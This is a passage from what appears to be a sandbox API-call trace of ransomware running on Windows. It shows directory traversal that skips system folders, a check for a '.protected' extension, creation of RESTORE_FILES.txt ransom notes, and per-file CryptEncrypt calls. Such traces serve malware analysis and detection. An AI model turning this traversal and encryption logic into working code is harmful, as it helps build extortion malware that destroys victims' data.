dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.157] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.157] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.158] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt") returned 68 [0093.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.158] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.158] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.158] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\RESTORE_FILES.txt") returned 63 [0093.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.159] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="Windows") returned -1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files") returned -1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files (x86)") returned -1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="$Recycle.bin") returned 1 [0093.159] lstrcmpiW (lpString1="DeviceSync", lpString2="System Volume Information") returned -1 [0093.159] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 43 [0093.159] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1 [0093.159] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1 [0093.159] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*") returned 45 [0093.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.159] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.159] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.159] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.159] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.159] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.159] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\.") returned 45 [0093.160] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.160] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.160] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.160] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.160] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.160] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\..") returned 46 [0093.160] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.160] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.160] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\RESTORE_FILES.txt") returned 61 [0093.160] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.160] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.160] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.160] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\RESTORE_FILES.txt") returned 61 [0093.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.160] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="Windows") returned -1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="Program Files") returned -1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="Program Files (x86)") returned -1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="$Recycle.bin") returned 1 [0093.160] lstrcmpiW (lpString1="DRM", lpString2="System Volume Information") returned -1 [0093.160] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned 36 [0093.160] lstrcmpW (lpString1="DRM", lpString2=".") returned 1 [0093.160] lstrcmpW (lpString1="DRM", lpString2="..") returned 1 [0093.160] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*") returned 38 [0093.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.161] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.161] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.161] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\.") returned 38 [0093.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.161] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.161] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.161] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.161] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\..") returned 39 [0093.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.161] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\RESTORE_FILES.txt") returned 54 [0093.161] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.161] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.161] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="Windows") returned -1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="Program Files") returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="Program Files (x86)") returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="$Recycle.bin") returned 1 [0093.161] lstrcmpiW (lpString1="Server", lpString2="System Volume Information") returned -1 [0093.161] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned 43 [0093.161] lstrcmpW (lpString1="Server", lpString2=".") returned 1 [0093.161] lstrcmpW (lpString1="Server", lpString2="..") returned 1 [0093.162] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*") returned 45 [0093.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.162] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.162] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.162] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.162] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.162] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.162] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\.") returned 45 [0093.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.162] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.162] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\." (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.162] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.163] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.163] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.163] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.163] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.163] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\..") returned 46 [0093.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.163] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.163] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.163] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.163] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\users\\all users\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.163] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.163] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt") returned 61 [0093.163] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.163] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.163] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.163] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt") returned 61 [0093.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.163] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.164] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.164] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\RESTORE_FILES.txt") returned 54 [0093.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.164] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="Windows") returned -1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="Program Files") returned -1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="Program Files (x86)") returned -1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="$Recycle.bin") returned 1 [0093.164] lstrcmpiW (lpString1="eHome", lpString2="System Volume Information") returned -1 [0093.164] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned 38 [0093.165] lstrcmpW (lpString1="eHome", lpString2=".") returned 1 [0093.165] lstrcmpW (lpString1="eHome", lpString2="..") returned 1 [0093.165] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*") returned 40 [0093.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.165] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.165] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.165] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.165] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.165] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.165] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\.") returned 40 [0093.165] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.165] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.165] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.165] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.165] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.165] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.165] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.165] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\..") returned 41 [0093.165] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.165] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.165] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.165] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0093.165] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0093.165] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0093.166] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0093.166] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0093.166] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned 43 [0093.166] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0093.166] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0093.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*") returned 45 [0093.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.166] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.166] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.166] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.166] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.166] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\.") returned 45 [0093.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.166] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.166] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.166] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.167] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.167] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.167] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.167] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\..") returned 46 [0093.167] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.167] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.167] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.167] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt") returned 61 [0093.167] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.167] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.167] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.167] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.167] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt") returned 61 [0093.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.167] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.167] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.167] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\RESTORE_FILES.txt") returned 56 [0093.167] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.167] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.167] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.167] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.167] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\RESTORE_FILES.txt") returned 56 [0093.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.168] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0093.168] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0093.168] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer") returned 45 [0093.168] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0093.168] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0093.169] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*") returned 47 [0093.169] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.169] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.169] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.169] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.169] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.169] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.169] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\.") returned 47 [0093.169] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.169] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.170] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.170] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.170] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.170] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.170] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.170] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Event Viewer\\..") returned 48 [0093.170] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.170] lstrcmpW 